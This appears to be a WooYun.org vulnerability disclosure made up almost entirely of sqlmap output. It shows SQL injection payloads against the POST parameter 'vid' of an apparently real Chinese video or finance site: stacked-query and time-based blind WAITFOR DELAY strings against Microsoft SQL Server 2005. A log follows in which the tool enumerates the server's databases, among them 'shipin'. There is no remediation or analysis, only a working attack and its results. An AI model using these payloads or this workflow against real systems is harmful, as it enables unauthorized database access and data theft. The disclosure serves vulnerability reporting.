WooYun.org

Place: POST
Parameter: vid
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: operate=add&type=caijing&vid=3449; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: operate=add&type=caijing&vid=3449 WAITFOR DELAY '0:0:5'--
---
[11:34:16] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2005
[11:34:16] [INFO] fetching database names
[11:34:16] [INFO] fetching number of databases
[11:34:16] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y\
[11:34:29] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[11:34:37] [INFO] adjusting time delay to 2 seconds due to good response times
[11:34:37] [ERROR] invalid character detected. retrying..
[11:34:37] [WARNING] increasing time delay to 3 seconds
5
[11:34:46] [INFO] retrieved: master
[11:36:07] [INFO] retrieved: model
[11:37:23] [INFO] retrieved: msdb
[11:38:16] [INFO] retrieved: shipin
[11:39:45] [INFO] retrieved: tempdb
available databases [5]:
[*] master
[*] model
[*] msdb
[*] shipin
[*] tempdb